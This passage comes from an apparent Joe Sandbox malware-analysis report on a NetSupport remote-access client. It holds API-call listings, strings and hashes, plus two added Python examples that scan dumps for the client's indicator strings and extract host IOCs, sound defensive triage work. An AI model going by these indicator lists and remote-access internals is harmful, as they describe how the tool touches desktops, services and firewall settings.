                                                                                      • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                      • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                      • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
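The function blocks above expose a set of fixed strings that the client binary passes to Win32 calls (the PCIMutex name given to OpenMutexA/CreateMutexA, NSM.LIC and pcicl32_res.dll in the resource-language routine, PCIINV.DLL with its GetInventory/GetInventoryEx/Cancel exports, the nsm_gina_sas event and \pcigina helper, the ..\ctl32\Connect.cpp path and the RememberPassword/ShowUIOnConnect settings). Those strings are a convenient triage signature for a memory dump or a dropped file. The scanner below is an added example written for this report, not Joe Sandbox or NetSupport code; it searches each indicator as ASCII and as UTF-16LE, and the minimum-of-three-distinct-hits rule and the SAMPLE buffer are the example's own constructed assumptions, not data from the analysis.

```python
"""Triage scanner for the NetSupport client strings listed in this report.

Added example (not Joe Sandbox or NetSupport code). Usage:
    python scan_netsupport.py <dump-or-pe-file>
"""
from __future__ import annotations

import sys
from collections import defaultdict

# Indicator strings copied from the "String ID" rows of the function blocks in
# this report; each value is the API context those rows give for the string.
INDICATORS: dict[bytes, str] = {
    b"PCIMutex":               "single-instance mutex (OpenMutexA / CreateMutexA)",
    b"NSM.LIC":                "licence file name used next to GetModuleFileNameA",
    b"pcicl32_res.dll":        "resource DLL loaded with LoadLibraryExA",
    b"PCIINV.DLL":             "inventory plug-in (GetInventory / GetInventoryEx / Cancel)",
    b"nsm_gina_sas":           "event name opened with OpenEventA",
    b"\\pcigina":              "GINA helper whose GrabKM / LoggedOn exports are resolved",
    b"..\\ctl32\\Connect.cpp": "source path string in the Connect.cpp function",
    b"RememberPassword":       "setting stored beside DefaultUsername / Password",
    b"ShowUIOnConnect":        "client UI setting beside HideWhenIdle",
}


def scan_buffer(data: bytes) -> dict[bytes, list[int]]:
    """Return every indicator present in `data`, mapped to the offsets at which
    it occurs. Each indicator is searched both as ASCII (the encoding the
    ANSI API calls in the report use) and as UTF-16LE, so a dump that holds
    wide strings is still matched."""
    hits: dict[bytes, list[int]] = defaultdict(list)
    for indicator in INDICATORS:
        wide = indicator.decode("ascii").encode("utf-16-le")
        for needle in (indicator, wide):
            start = 0
            while (pos := data.find(needle, start)) != -1:
                hits[indicator].append(pos)
                start = pos + 1
    return dict(hits)


def is_netsupport_client(hits: dict[bytes, list[int]], min_distinct: int = 3) -> bool:
    """Assumed triage rule: require several *distinct* indicators. A single
    DLL or setting name can appear in unrelated software, so one hit alone
    should not be treated as a verdict."""
    return len(hits) >= min_distinct


def scan_file(path: str) -> dict[bytes, list[int]]:
    """Read a dump or PE file fully into memory and scan it."""
    with open(path, "rb") as fh:
        return scan_buffer(fh.read())


# Constructed sample buffer for offline use (not real dump data): three
# indicators, one of them UTF-16LE, embedded between filler bytes.
SAMPLE = (
    b"\x00" * 16
    + b"PCIMutex\x00"
    + b"filler"
    + "NSM.LIC".encode("utf-16-le")
    + b"\x00" * 8
    + b"PCIINV.DLL\x00GetInventory\x00"
)


def report(hits: dict[bytes, list[int]]) -> str:
    """Render the hits as one line per indicator, with the report's context."""
    lines = []
    for indicator, offsets in sorted(hits.items()):
        offs = ", ".join(f"0x{o:x}" for o in offsets)
        lines.append(f"{indicator.decode():24} at {offs:20} {INDICATORS[indicator]}")
    verdict = "likely NetSupport client" if is_netsupport_client(hits) else "insufficient"
    lines.append(f"{len(hits)} distinct indicator(s): {verdict}")
    return "\n".join(lines)


if __name__ == "__main__":
    found = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_buffer(SAMPLE)
    print(report(found))
```

Run it against the .sdmp files listed under Memory Dump Source to confirm the strings survive in the process image, or against a dropped client binary; the UTF-16LE pass costs nothing on ASCII-only data and avoids a false negative when a string has been widened.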
APIs
• OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
• GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
• SetLastError.KERNEL32(00000078), ref: 110306C2
• WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
• CloseHandle.KERNEL32(?), ref: 11030709
• FreeLibrary.KERNEL32(?), ref: 11030714
• CloseHandle.KERNEL32(00000000), ref: 1103071B
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
• String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
• API String ID: 2061479752-1320826866
• Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
• Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
• Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
• Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
APIs
  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
• GetTickCount.KERNEL32 ref: 1102C47A
  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
• GetTickCount.KERNEL32 ref: 1102C574
  • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
• CloseHandle.KERNEL32(?), ref: 1102C688
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
• String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp$
• API String ID: 596640303-1015715393
• Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
• Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
• Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
• Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
APIs
• RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
  • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
  • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
• RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
• RegCloseKey.ADVAPI32(?), ref: 11061881
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Enum$Open$CloseValue
• String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
• API String ID: 2823542970-1528906934
• Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
• Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
• Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
• Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• GetTickCount.KERNEL32 ref: 11137692
  • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
  • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
  • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
  • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
• GetTickCount.KERNEL32 ref: 111376A1
• _memset.LIBCMT ref: 111376E3
• GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
• _strrchr.LIBCMT ref: 11137708
• _free.LIBCMT ref: 1113775A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
• String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
• API String ID: 711243594-1270230032
• Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
• Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
• Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
• Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
APIs
  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
• AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
• LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
• GetSystemMetrics.USER32(00000021), ref: 11133EE9
• GetSystemMetrics.USER32(0000000F), ref: 11133EF1
• GetSystemMetrics.USER32(00000004), ref: 11133EF7
• GetDC.USER32(00000000), ref: 11133F03
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
• ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
• CreateWindowExA.USER32(00000001,NSMWClass,02FF0900,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
• GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
• String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
• API String ID: 1594747848-1114959992
• Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
• Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
• Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
• Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
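The function blocks in this report list raw API calls with hex-encoded arguments, and the host indicators an analyst needs for hunting (the named mutex, the policy registry key, the service and window-class names, the GeoIP URL) are scattered across them. The following is an added example, not part of the Joe Sandbox report and not NetSupport's own code: it parses API lines in the listing format shown on this page and pulls those indicators out, decoding the HKEY root and the common access masks. The sample lines are copied from the function blocks of this report; the line-format regular expression, the "literal argument" heuristic (anything that does not parse as hex and is not "?") and the constant tables are this example's own assumptions about the listing.

```python
"""Extract host IOCs from Joe Sandbox per-function API listings.

Added example (not the report's or NetSupport's code). Assumes each API line
has the shape '• Api.MODULE(arg,arg,...), ref: ADDR' or '• Api.MODULE ref: ADDR',
optionally prefixed by 'Part of subcall function ADDR: '.
"""
import re
from collections import defaultdict

# Constructed sample: API and String ID lines copied from the function blocks
# of this report. Leading spaces mark the 'Part of subcall' lines as in the listing.
SAMPLE = r"""
• OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
• GetTickCount.KERNEL32 ref: 1102C47A
• RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
  • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
• OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
• CreateWindowExA.USER32(00000001,NSMWClass,02FF0900,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
  • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
• String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp$
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<body>.*)$")

# Documented Win32 constants (HKEY roots, access masks) used to decode arguments.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
ACCESS_NAMES = {  # (api, argument index) -> {mask: name}
    ("OpenMutexA", 0): {0x1F0001: "MUTEX_ALL_ACCESS"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ"},
    ("OpenServiceA", 2): {0x4: "SERVICE_QUERY_STATUS"},
    ("OpenSCManagerA", 2): {0xF003F: "SC_MANAGER_ALL_ACCESS"},
}


def _hex(arg):
    """Integer value of a hex argument, or None if the sandbox printed a string or '?'."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def _is_literal(arg):
    """Heuristic (assumption): a non-hex, non-'?' argument is a resolved string literal."""
    return arg != "?" and _hex(arg) is None


def parse_api_line(line):
    """Parse one API line into a dict, or return None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in raw.split(",")] if raw else [],
        "ref": int(m.group("ref"), 16),
        "caller": int(m.group("caller"), 16) if m.group("caller") else None,
        "subcall": m.group("caller") is not None,
    }


def parse_listing(text):
    """Return (api_calls, string_ids) for a block of listing text."""
    calls, strings = [], []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            calls.append(call)
            continue
        m = STRING_LINE.match(line)
        if m:  # String IDs are '$'-separated; drop the empty trailing token
            strings.extend(s for s in m.group("body").split("$") if s)
    return calls, strings


def access_name(call):
    """Symbolic name of a known access-mask argument of this call, or None."""
    table = ACCESS_NAMES.get((call["api"], 0)) and (call["api"], 0)
    for (api, idx), names in ACCESS_NAMES.items():
        if call["api"] == api and len(call["args"]) > idx:
            return names.get(_hex(call["args"][idx]))
    return None


def extract_iocs(text):
    """Collect named objects the sample touches, keyed by indicator type."""
    calls, strings = parse_listing(text)
    iocs = defaultdict(set)
    for c in calls:
        api, args = c["api"], c["args"]
        if api in ("OpenMutexA", "CreateMutexA") and len(args) >= 3 and _is_literal(args[2]):
            iocs["mutex"].add(args[2])
        elif api == "RegOpenKeyExA" and len(args) >= 2 and _is_literal(args[1]):
            root = HKEY_ROOTS.get(_hex(args[0]), args[0])  # unresolved handle stays as printed
            iocs["registry"].add(root + "\\" + args[1])
        elif api == "OpenServiceA" and len(args) >= 2 and _is_literal(args[1]):
            iocs["service"].add(args[1])
        elif api == "CreateWindowExA" and len(args) >= 2 and _is_literal(args[1]):
            iocs["window_class"].add(args[1])
        elif api == "CLSIDFromProgID" and args and _is_literal(args[0]):
            iocs["com_progid"].add(args[0])
    for s in strings:
        if re.match(r"https?://", s):
            iocs["url"].add(s)
    return {k: sorted(v) for k, v in iocs.items()}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE).items():
        print(f"{kind}: {', '.join(values)}")
```

Calls whose arguments the sandbox could not resolve (printed as "?", like the second RegOpenKeyExA above, whose hKey is an open handle rather than an HKEY root) are parsed but contribute no indicator, so the output only contains names that actually appear as literals in the listing. The decoded access masks make the behaviour readable at a glance: the client opens PCIMutex with MUTEX_ALL_ACCESS to detect a running instance, reads its policy key with KEY_READ and queries ProtectedStorage with SERVICE_QUERY_STATUS only.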
                                                                                      APIs
                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,4012B9B4,?,00000000,00000000), ref: 1102CE44
                                                                                      • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                      • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                      • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                      • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                      • API String ID: 83693535-2077998243
                                                                                      APIs
                                                                                      • _strtok.LIBCMT ref: 11026C26
                                                                                      • _strtok.LIBCMT ref: 11026C60
                                                                                      • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strtok$Sleep
                                                                                      • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS$
                                                                                      • API String ID: 2009458258-2711220648
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11132C60
                                                                                      • GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$FolderPathwsprintf
                                                                                      • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                      • API String ID: 1170620360-4157686185
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      • _strncpy.LIBCMT ref: 111451FA
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                      • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                      • API String ID: 3299820421-2117887902
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                      • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                      • GetLastError.KERNEL32 ref: 11102CB1
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                      • GetLastError.KERNEL32 ref: 11102CCF
                                                                                      Strings
                                                                                      • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                      • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                      • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
